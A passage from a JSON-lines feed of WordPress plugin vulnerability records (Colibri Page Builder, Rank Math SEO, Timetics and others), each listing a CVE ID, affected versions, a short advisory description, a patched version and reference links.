version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ae4226-0089-47fb-87b9-94e9faf764e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ae4226-0089-47fb-87b9-94e9faf764e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/breadcrumb.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/breadcrumb.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2117","slug":"image-optimizer-wd","versionEndExcluding":"1.0.27","description":"The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44024299-ba40-4da7-81e1-bd44d10846f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44024299-ba40-4da7-81e1-bd44d10846f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2122","slug":"image-optimizer-wd","versionEndExcluding":"1.0.27","description":"The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitise and escape the iowd_tabs_active parameter before rendering it in the plugin admin panel, leading to a reflected Cross-Site Scripting vulnerability, allowing an attacker to trick a logged in admin to execute arbitrary javascript by clicking a link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936fd93a-428d-4744-a4fc-c8da78dcbe78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936fd93a-428d-4744-a4fc-c8da78dcbe78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3338","slug":"colibri-page-builder","versionImpact":"1.0.262","versionEndExcluding":"1.0.264","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt data parameter in all versions up to, and including, 1.0.262 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.264, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a066eae-4040-4d76-b730-47d98dc37662?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a066eae-4040-4d76-b730-47d98dc37662?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/extend-builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/extend-builder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1870","slug":"colibri-page-builder","versionImpact":"1.0.260","versionEndExcluding":"1.0.263","description":"The Colibri Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callActivateLicenseEndpoint function in all versions up to, and including, 1.0.260. This makes it possible for authenticated attackers, with subscriber access or higher, to update the license key.","recommendation":"Update to version 1.0.263, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045582\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045582\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9263","slug":"timetics","versionImpact":"1.0.25","versionEndExcluding":"1.0.26","description":"The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to Account Takeover\/Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 1.0.25 via the save() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to reset the emails and passwords of arbitrary user accounts, including administrators, which makes account takeover and privilege escalation possible.","recommendation":"Update to version 1.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/tags\\\/1.0.25\\\/core\\\/customers\\\/customer.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/tags\\\/1.0.25\\\/core\\\/customers\\\/customer.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/customer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/customer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12337","slug":"wc-planzer-shipping","versionImpact":"1.0.25","versionEndExcluding":"1.0.26","description":"The Shipping via Planzer for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018processed-ids\u2019 parameter in all versions up to, and including, 1.0.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214785\\\/wc-planzer-shipping\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214785\\\/wc-planzer-shipping\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e80ed130-8ad2-4fb0-a583-02fc675804d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e80ed130-8ad2-4fb0-a583-02fc675804d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6988","slug":"colibri-page-builder","versionImpact":"1.0.239","versionEndExcluding":"1.0.240","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's extend_builder_render_js shortcode in all versions up to, and including, 1.0.239 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.240, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/300b24af-10a1-45b9-87ec-7c98dc94e76b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/300b24af-10a1-45b9-87ec-7c98dc94e76b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/render-js.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/render-js.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013337%40colibri-page-builder&new=3013337%40colibri-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013337%40colibri-page-builder&new=3013337%40colibri-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2710","slug":"wp-responsive-video-gallery-with-lightbox","versionEndExcluding":"1.0.23","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.22  due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.22\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.22\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.23\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.23\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e88bb3a8-de24-46fb-a3e4-9ca3fdd4cca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e88bb3a8-de24-46fb-a3e4-9ca3fdd4cca7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1716","slug":"admin-bar","versionImpact":"1.0.2.2","versionEndExcluding":"1.0.23","description":"The Admin Bar Remover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_form() function in all versions up to, and including, 1.0.2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable or disable the admin bar on the front-end of the site.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbf2556-0509-4d8a-8949-494c6bc82ea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbf2556-0509-4d8a-8949-494c6bc82ea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-bar\\\/trunk\\\/Inc\\\/Classes\\\/AdminBarRemover.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-bar\\\/trunk\\\/Inc\\\/Classes\\\/AdminBarRemover.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955636\\\/admin-bar\\\/trunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955636\\\/admin-bar\\\/trunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12465","slug":"property-hive-stamp-duty-calculator","versionImpact":"1.0.22","versionEndExcluding":"1.0.23","description":"The Property Hive Stamp Duty Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stamp_duty_calculator_scotland' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207024%40property-hive-stamp-duty-calculator&new=3207024%40property-hive-stamp-duty-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207024%40property-hive-stamp-duty-calculator&new=3207024%40property-hive-stamp-duty-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0965","slug":"simple-page-access-restriction","versionImpact":"1.0.21","versionEndExcluding":"1.0.23","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030099\\\/simple-page-access-restriction\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030099\\\/simple-page-access-restriction\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9314","slug":"seo-by-rank-math","versionImpact":"1.0.228","versionEndExcluding":"1.0.229","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.228 via deserialization of untrusted input 'set_redirections' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.0.229, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af5ed47e-f183-4e72-a916-15020e2bc91e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af5ed47e-f183-4e72-a916-15020e2bc91e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L507\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9161","slug":"seo-by-rank-math","versionImpact":"1.0.228","versionEndExcluding":"1.0.229","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'update_metadata' function in all versions up to, and including, 1.0.228. This makes it possible for unauthenticated attackers to insert new and update existing metadata beginning with 'rank_math', and delete arbitrary existing user metadata and term metadata. Deleting existing usermeta can cause a loss of access to the administrator dashboard for any registered users, including Administrators.","recommendation":"Update to version 1.0.229, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df39a64-76c5-4ebe-a271-44bd147a3a86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df39a64-76c5-4ebe-a271-44bd147a3a86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1094","slug":"timetics","versionImpact":"1.0.21","versionEndExcluding":"1.0.22","description":"The Timetics- AI-powered Appointment Booking with Visual Seat Plan and ultimate Calendar Scheduling plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the make_staff() function in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to grant users staff permissions.","recommendation":"Update to version 1.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76fe8746-582e-49a5-b0c1-19d2aaef44df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76fe8746-582e-49a5-b0c1-19d2aaef44df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101489\\\/timetics\\\/trunk\\\/core\\\/staffs\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101489\\\/timetics\\\/trunk\\\/core\\\/staffs\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8741","slug":"beam-me-up-scotty","versionImpact":"1.0.21","versionEndExcluding":"1.0.22","description":"The Beam me up Scotty \u2013 Back to Top Button plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3428bc71-64f9-4f8d-85c8-7dda81b2ac18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3428bc71-64f9-4f8d-85c8-7dda81b2ac18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beam-me-up-scotty\\\/tags\\\/1.0.21\\\/library\\\/template-parts\\\/tabs.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beam-me-up-scotty\\\/tags\\\/1.0.21\\\/library\\\/template-parts\\\/tabs.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156146\\\/beam-me-up-scotty\\\/trunk\\\/library\\\/template-parts\\\/tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156146\\\/beam-me-up-scotty\\\/trunk\\\/library\\\/template-parts\\\/tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4617","slug":"seo-by-rank-math","versionImpact":"1.0.218","versionEndExcluding":"1.0.219-beta","description":"The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in versions up to, and including, 1.0.218 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.219-beta, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/474fdbcb-fe3c-4a79-a847-363f81b300c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/474fdbcb-fe3c-4a79-a847-363f81b300c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block-faq.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block-faq.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084351\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084351\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4627","slug":"seo-by-rank-math","versionImpact":"1.0.218","versionEndExcluding":"1.0.219","description":"The Rank Math SEO  WordPress plugin before 1.0.219 does not sanitise and escape some of its settings, which could allow users with access to the General Settings (by default admin, however such access can be given to lower roles via the Role Manager feature of the Rank Math SEO  WordPress plugin before 1.0.219) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.0.219, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0058fcc-36f6-40bf-9848-fbe2d751d754\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0058fcc-36f6-40bf-9848-fbe2d751d754\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4335","slug":"seo-by-rank-math","versionImpact":"1.0.217","versionEndExcluding":"1.0.218","description":"The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018textAlign\u2019 parameter in versions up to, and including, 1.0.217 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.218, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080259\\\/#file26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080259\\\/#file26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/tags\\\/1.0.217\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/tags\\\/1.0.217\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96eba67c-58e7-4eea-84d4-9b3bb275b42d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96eba67c-58e7-4eea-84d4-9b3bb275b42d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23664","slug":" convertbox-auto-embed","versionEndExcluding":"1.0.20","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ConvertBox ConvertBox Auto Embed WordPress plugin <=\u00a01.0.19 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/convertbox-auto-embed\\\/wordpress-convertbox-auto-embed-wordpress-plugin-plugin-1-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/convertbox-auto-embed\\\/wordpress-convertbox-auto-embed-wordpress-plugin-plugin-1-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3585","slug":"send-pdf-for-contact-form-7","versionImpact":"1.0.2.3","versionEndExcluding":"1.0.2.4","description":"The Send PDF for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of form submissions due to a missing capability check on the hooks function in all versions up to, and including, 1.0.2.3. This makes it possible for unauthenticated attackers to download information about contact form entries with PDFs.","recommendation":"Update to version 1.0.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0646fcba-afe5-49a2-acd5-e15d009926c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0646fcba-afe5-49a2-acd5-e15d009926c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/send-pdf-for-contact-form-7\\\/trunk\\\/classes\\\/send-pdf.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/send-pdf-for-contact-form-7\\\/trunk\\\/classes\\\/send-pdf.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074631\\\/send-pdf-for-contact-form-7\\\/trunk?contextall=1&old=3069882&old_path=%2Fsend-pdf-for-contact-form-7%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074631\\\/send-pdf-for-contact-form-7\\\/trunk?contextall=1&old=3069882&old_path=%2Fsend-pdf-for-contact-form-7%2Ftrunk\",\"refsource\":\"\",\"tags\